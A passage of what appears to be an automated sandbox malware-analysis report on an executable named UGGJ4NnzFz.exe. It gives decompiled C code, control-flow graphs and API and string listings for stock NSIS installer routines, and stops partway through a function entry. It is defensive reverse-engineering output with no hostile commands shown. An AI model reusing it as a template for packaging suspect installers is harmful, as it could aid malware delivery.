                                                                                                                • API String ID: 310444273-0
                                                                                                                • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                                • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                                                0x00405e6c
                                                                                                                0x00405e75
                                                                                                                0x00000000
                                                                                                                0x00405e82
                                                                                                                0x00405e78
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,74B5F560), ref: 00405E6C
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                                • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 108 4036af-4036c7 call 405e88 111 4036c9-4036d9 call 405ac4 108->111 112 4036db-403702 call 405a4d 108->112 120 403725-40374e call 403978 call 40573a 111->120 116 403704-403715 call 405a4d 112->116 117 40371a-403720 lstrcatA 112->117 116->117 117->120 126 403754-403759 120->126 127 4037d5-4037dd call 40573a 120->127 126->127 128 40375b-40377f call 405a4d 126->128 132 4037eb-403810 LoadImageA 127->132 133 4037df-4037e6 call 405b88 127->133 128->127 138 403781-403783 128->138 136 403816-40384c RegisterClassA 132->136 137 40389f-4038a7 call 40140b 132->137 133->132 141 403852-40389a SystemParametersInfoA CreateWindowExA 136->141 142 40396e 136->142 151 4038b1-4038bc call 403978 137->151 152 4038a9-4038ac 137->152 139 403794-4037a0 lstrlenA 138->139 140 403785-403792 call 405684 138->140 145 4037a2-4037b0 lstrcmpiA 139->145 146 4037c8-4037d0 call 405659 call 405b66 139->146 140->139 141->137 148 403970-403977 142->148 145->146 150 4037b2-4037bc GetFileAttributesA 145->150 146->127 154 4037c2-4037c3 call 4056a0 150->154 155 4037be-4037c0 150->155 161 4038c2-4038df ShowWindow LoadLibraryA 151->161 162 403945-40394d call 404fd6 151->162 152->148 154->146 155->146 155->154 164 4038e1-4038e6 LoadLibraryA 161->164 165 4038e8-4038fa GetClassInfoA 161->165 170 403967-403969 call 40140b 162->170 171 40394f-403955 162->171 164->165 167 403912-403943 DialogBoxParamA call 40140b call 4035ff 165->167 168 4038fc-40390c GetClassInfoA RegisterClassA 165->168 167->148 168->167 170->142 171->152 173 40395b-403962 call 40140b 171->173 173->152
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t85 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                0x004036b5
                                                                                                                0x004036be
                                                                                                                0x004036c5
                                                                                                                0x004036c7
                                                                                                                0x004036db
                                                                                                                0x004036ed
                                                                                                                0x004036f7
                                                                                                                0x004036fc
                                                                                                                0x00403702
                                                                                                                0x00403715
                                                                                                                0x00403715
                                                                                                                0x00403720
                                                                                                                0x004036c9
                                                                                                                0x004036d4
                                                                                                                0x004036d4
                                                                                                                0x00403725
                                                                                                                0x0040372f
                                                                                                                0x00403738
                                                                                                                0x0040373d
                                                                                                                0x0040374e
                                                                                                                0x004037d5
                                                                                                                0x004037dd
                                                                                                                0x004037e6
                                                                                                                0x004037e6
                                                                                                                0x004037fc
                                                                                                                0x00403802
                                                                                                                0x00403810
                                                                                                                0x0040389f
                                                                                                                0x004038a7
                                                                                                                0x004038b1
                                                                                                                0x004038b6
                                                                                                                0x004038bc
                                                                                                                0x00403946
                                                                                                                0x0040394b
                                                                                                                0x0040394d
                                                                                                                0x00403969
                                                                                                                0x00000000
                                                                                                                0x00403969
                                                                                                                0x0040394f
                                                                                                                0x00403955
                                                                                                                0x0040395d
                                                                                                                0x0040395d
                                                                                                                0x00000000
                                                                                                                0x00403955
                                                                                                                0x004038ca
                                                                                                                0x004038db
                                                                                                                0x004038dd
                                                                                                                0x004038df
                                                                                                                0x004038e6
                                                                                                                0x004038e6
                                                                                                                0x004038ee
                                                                                                                0x004038f6
                                                                                                                0x004038f8
                                                                                                                0x004038fa
                                                                                                                0x00403903
                                                                                                                0x00403906
                                                                                                                0x0040390c
                                                                                                                0x0040390c
                                                                                                                0x0040392b
                                                                                                                0x0040393c
                                                                                                                0x00000000
                                                                                                                0x00403941
                                                                                                                0x004038a9
                                                                                                                0x004038ab
                                                                                                                0x00000000
                                                                                                                0x00403816
                                                                                                                0x00403816
                                                                                                                0x0040381c
                                                                                                                0x00403826
                                                                                                                0x0040382e
                                                                                                                0x00403838
                                                                                                                0x0040383e
                                                                                                                0x0040384c
                                                                                                                0x0040396e
                                                                                                                0x0040396e
                                                                                                                0x00000000
                                                                                                                0x0040396e
                                                                                                                0x00403852
                                                                                                                0x0040385b
                                                                                                                0x0040389a
                                                                                                                0x00000000
                                                                                                                0x0040389a
                                                                                                                0x00403754
                                                                                                                0x00403754
                                                                                                                0x00403759
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403763
                                                                                                                0x00403773
                                                                                                                0x00403778
                                                                                                                0x0040377f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403783
                                                                                                                0x00403785
                                                                                                                0x00403792
                                                                                                                0x00403792
                                                                                                                0x0040379a
                                                                                                                0x004037a0
                                                                                                                0x004037c8
                                                                                                                0x004037d0
                                                                                                                0x00000000
                                                                                                                0x004037b2
                                                                                                                0x004037b3
                                                                                                                0x004037bc
                                                                                                                0x004037c2
                                                                                                                0x004037c3
                                                                                                                0x00000000
                                                                                                                0x004037c3
                                                                                                                0x004037be
                                                                                                                0x004037c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004037c0
                                                                                                                0x004037a0

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                  • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                  • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                • lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
                                                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ), ref: 00403795
                                                                                                                • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
                                                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 004037B3
                                                                                                                • LoadImageA.USER32 ref: 004037FC
                                                                                                                  • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                • RegisterClassA.USER32 ref: 00403843
                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                                • CreateWindowExA.USER32 ref: 00403894
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                                • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                                • GetClassInfoA.USER32 ref: 004038F6
                                                                                                                • GetClassInfoA.USER32 ref: 00403903
                                                                                                                • RegisterClassA.USER32 ref: 0040390C
                                                                                                                • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: "C:\Users\user\Desktop\UGGJ4NnzFz.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                • API String ID: 914957316-2225522145
                                                                                                                • Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                                • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                                • Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                                • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 179 402c72-402cc0 GetTickCount GetModuleFileNameA call 40583d 182 402cc2-402cc7 179->182 183 402ccc-402cfa call 405b66 call 4056a0 call 405b66 GetFileSize 179->183 184 402f11-402f15 182->184 191 402d00-402d17 183->191 192 402dea-402df8 call 402bd3 183->192 194 402d19 191->194 195 402d1b-402d21 call 4031bf 191->195 198 402ec9-402ece 192->198 199 402dfe-402e01 192->199 194->195 200 402d26-402d28 195->200 198->184 203 402e03-402e1b call 4031f1 call 4031bf 199->203 204 402e2d-402e79 GlobalAlloc call 405f62 call 40586c CreateFileA 199->204 201 402e85-402e8d call 402bd3 200->201 202 402d2e-402d34 200->202 201->198 205 402db4-402db8 202->205 206 402d36-402d4e call 4057fe 202->206 203->198 231 402e21-402e27 203->231 229 402e7b-402e80 204->229 230 402e8f-402ebf call 4031f1 call 402f18 204->230 214 402dc1-402dc7 205->214 215 402dba-402dc0 call 402bd3 205->215 206->214 224 402d50-402d57 206->224 216 402dc9-402dd7 call 405ef4 214->216 217 402dda-402de4 214->217 215->214 216->217 217->191 217->192 224->214 228 402d59-402d60 224->228 228->214 232 402d62-402d69 228->232 229->184 239 402ec4-402ec7 230->239 231->198 231->204 232->214 234 402d6b-402d72 232->234 234->214 236 402d74-402d94 234->236 236->198 238 402d9a-402d9e 236->238 240 402da0-402da4 238->240 241 402da6-402dae 238->241 239->198 242 402ed0-402ee1 239->242 240->192 240->241 241->214 245 402db0-402db2 241->245 243 402ee3 242->243 244 402ee9-402eee 242->244 243->244 246 402eef-402ef5 244->246 245->214 246->246 247 402ef7-402f0f call 4057fe 246->247 247->184
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\UGGJ4NnzFz.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\hardz\\Desktop\\UGGJ4NnzFz.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\UGGJ4NnzFz.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x3e2a7
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x0
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                                                                                                0x00402c80
                                                                                                                0x00402c83
                                                                                                                0x00402c9d
                                                                                                                0x00402ca2
                                                                                                                0x00402cb5
                                                                                                                0x00402cba
                                                                                                                0x00402cc0
                                                                                                                0x00000000
                                                                                                                0x00402cc2
                                                                                                                0x00402cd3
                                                                                                                0x00402ce4
                                                                                                                0x00402ceb
                                                                                                                0x00402cf3
                                                                                                                0x00402cf8
                                                                                                                0x00402cfa
                                                                                                                0x00402dea
                                                                                                                0x00402dec
                                                                                                                0x00402df8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402e01
                                                                                                                0x00402e2d
                                                                                                                0x00402e32
                                                                                                                0x00402e3d
                                                                                                                0x00402e3f
                                                                                                                0x00402e50
                                                                                                                0x00402e6b
                                                                                                                0x00402e74
                                                                                                                0x00402e79
                                                                                                                0x00402e98
                                                                                                                0x00402ea8
                                                                                                                0x00402eba
                                                                                                                0x00402ebf
                                                                                                                0x00402ec7
                                                                                                                0x00402ed4
                                                                                                                0x00402edc
                                                                                                                0x00402ee1
                                                                                                                0x00402ee3
                                                                                                                0x00402ee3
                                                                                                                0x00402eeb
                                                                                                                0x00402eeb
                                                                                                                0x00402eee
                                                                                                                0x00402eef
                                                                                                                0x00402eef
                                                                                                                0x00402ef2
                                                                                                                0x00402ef4
                                                                                                                0x00402ef4
                                                                                                                0x00402ef7
                                                                                                                0x00402efe
                                                                                                                0x00402f0a
                                                                                                                0x00000000
                                                                                                                0x00402f0f
                                                                                                                0x00000000
                                                                                                                0x00402ec7
                                                                                                                0x00000000
                                                                                                                0x00402e7b
                                                                                                                0x00402e09
                                                                                                                0x00402e1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d00
                                                                                                                0x00402d00
                                                                                                                0x00402d05
                                                                                                                0x00402d09
                                                                                                                0x00402d10
                                                                                                                0x00402d17
                                                                                                                0x00402d19
                                                                                                                0x00402d19
                                                                                                                0x00402d21
                                                                                                                0x00402d28
                                                                                                                0x00402e87
                                                                                                                0x00402ec9
                                                                                                                0x00000000
                                                                                                                0x00402ec9
                                                                                                                0x00402d34
                                                                                                                0x00402db8
                                                                                                                0x00402dbb
                                                                                                                0x00402dc0
                                                                                                                0x00000000
                                                                                                                0x00402db8
                                                                                                                0x00402d41
                                                                                                                0x00402d46
                                                                                                                0x00402d4e
                                                                                                                0x00402d74
                                                                                                                0x00402d7a
                                                                                                                0x00402d83
                                                                                                                0x00402d89
                                                                                                                0x00402d8e
                                                                                                                0x00402d94
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d9e
                                                                                                                0x00402da6
                                                                                                                0x00402da9
                                                                                                                0x00402dae
                                                                                                                0x00402db0
                                                                                                                0x00402db0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d9e
                                                                                                                0x00402dc1
                                                                                                                0x00402dc7
                                                                                                                0x00402dd7
                                                                                                                0x00402dd7
                                                                                                                0x00402dda
                                                                                                                0x00402de0
                                                                                                                0x00402de2
                                                                                                                0x00000000
                                                                                                                0x00402d00

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\UGGJ4NnzFz.exe,00000400), ref: 00402CA2
                                                                                                                  • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\UGGJ4NnzFz.exe,80000000,00000003), ref: 00405841
                                                                                                                  • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\UGGJ4NnzFz.exe,C:\Users\user\Desktop\UGGJ4NnzFz.exe,80000000,00000003), ref: 00402CEB
                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32
                                                                                                                Strings
                                                                                                                • Inst, xrefs: 00402D59
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                                                • "C:\Users\user\Desktop\UGGJ4NnzFz.exe" , xrefs: 00402C7F
                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                                                • soft, xrefs: 00402D62
                                                                                                                • C:\Users\user\Desktop\UGGJ4NnzFz.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                                                • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                                                • Error launching installer, xrefs: 00402CC2
                                                                                                                • Null, xrefs: 00402D6B
                                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                • String ID: "C:\Users\user\Desktop\UGGJ4NnzFz.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\UGGJ4NnzFz.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                • API String ID: 2803837635-1560703290
                                                                                                                • Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                                • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                                • Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                                • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
